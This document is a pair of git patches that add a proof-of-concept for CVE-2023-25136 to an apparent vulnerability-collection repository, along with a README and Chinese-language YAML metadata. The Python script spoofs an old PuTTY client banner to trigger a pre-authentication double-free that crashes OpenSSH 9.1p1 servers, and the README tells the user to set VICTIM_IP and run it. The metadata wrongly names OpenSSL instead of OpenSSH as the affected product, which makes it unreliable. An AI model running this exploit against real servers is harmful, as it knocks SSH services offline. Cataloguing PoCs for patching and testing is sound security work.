From e563241c4d6cdc8fd14c4382eaf571c454228ad5 Mon Sep 17 00:00:00 2001 From: xuwenhan Date: Wed, 8 Mar 2023 19:03:51 +0800 Subject: [PATCH 1/2] add CVE-2023-25136 --- .../2023/CVE-2023-25136/CVE-2023-25136.py | 12 +++++++++ cve/openssl/2023/CVE-2023-25136/README.md | 26 +++++++++++++++++++ cve/openssl/2023/yaml/CVE-2023-25136.yaml | 21 +++++++++++++++ 3 files changed, 59 insertions(+) create mode 100644 cve/openssl/2023/CVE-2023-25136/CVE-2023-25136.py create mode 100644 cve/openssl/2023/CVE-2023-25136/README.md create mode 100644 cve/openssl/2023/yaml/CVE-2023-25136.yaml diff --git a/cve/openssl/2023/CVE-2023-25136/CVE-2023-25136.py b/cve/openssl/2023/CVE-2023-25136/CVE-2023-25136.py new file mode 100644 index 00000000..b0a37cce --- /dev/null +++ b/cve/openssl/2023/CVE-2023-25136/CVE-2023-25136.py @@ -0,0 +1,12 @@ +import paramiko + +VICTIM_IP = "127.0.0.1" +CLIENT_ID = "PuTTY_Release_0.64" + +def main(): + transport = paramiko.Transport(VICTIM_IP) + transport.local_version = f"SSH-2.0-{CLIENT_ID}" + transport.connect(username='', password='') + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/cve/openssl/2023/CVE-2023-25136/README.md b/cve/openssl/2023/CVE-2023-25136/README.md new file mode 100644 index 00000000..5166c9ee --- /dev/null +++ b/cve/openssl/2023/CVE-2023-25136/README.md @@ -0,0 +1,26 @@ +# CVE-2023-25136 Proof-of-Concept + +### Overview + +This is a DoS Proof-of-Concept of OpenSSH 9.1p1 Double-Free Vulnerability CVE-2023-25136. +It will trigger the double-free and cause an abort crash. +For a comprehensive understanding, check out the accompanying [blog post](https://jfrog.com/blog/openssh-pre-auth-double-free-cve-2023-25136-writeup-and-proof-of-concept/) for in-depth details. + +### Dependencies + +* Python 3.6+ +* `paramiko` Python Library + +### Usage + +1. Verify `paramiko` is installed: +``` +pip install paramiko +``` + +2. Change the `VICTIM_IP` to match your vulnerable OpenSSH Server IP. + +3. Run the PoC: +``` +python cve-2023-25136.py +``` \ No newline at end of file diff --git a/cve/openssl/2023/yaml/CVE-2023-25136.yaml b/cve/openssl/2023/yaml/CVE-2023-25136.yaml new file mode 100644 index 00000000..6879369c --- /dev/null +++ b/cve/openssl/2023/yaml/CVE-2023-25136.yaml @@ -0,0 +1,21 @@ +id: CVE-2023-25136 +source: + https://github.com/jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free +info: + name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 + severity: medium + description: | + OpenSSH服务在针对putty老版本等客户端连接时做了兼容处理,导致compat_kex_proposal函数在options.kex_algorithms处理时存在双重释放漏洞。未经身份验证的攻击者可以触发双重释放,从而跳转到sshd地址空间的任意位置,可实现DoS攻击,理论上可执行任意代码。 + scope-of-influence: + OpenSSL 9.1 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2023-25136 + - https://github.com/openssh/openssh-portable/commit/486c4dc3b83b4b67d663fb0fa62bc24138ec3946 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H + cvss-score: 6.5 + cve-id: CVE-2023-25136 + cwe-id: CWE-415 + cnvd-id: None + kve-id: None + tags: 拒绝服务,DoS \ No newline at end of file -- Gitee From 0750920444c2e2b3cac969304fcfdc46908e1247 Mon Sep 17 00:00:00 2001 From: xuwenhan Date: Wed, 8 Mar 2023 19:06:07 +0800 Subject: [PATCH 2/2] update openkylin_list.yaml for CVE-2023-25136 --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 1c46ad09..1c5bc747 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -42,6 +42,7 @@ cve: - CVE-2022-2598 openssl: - CVE-2022-1292 + - CVE-2023-25136 libxml2: - CVE-2020-24977 - CVE-2021-3517 -- Gitee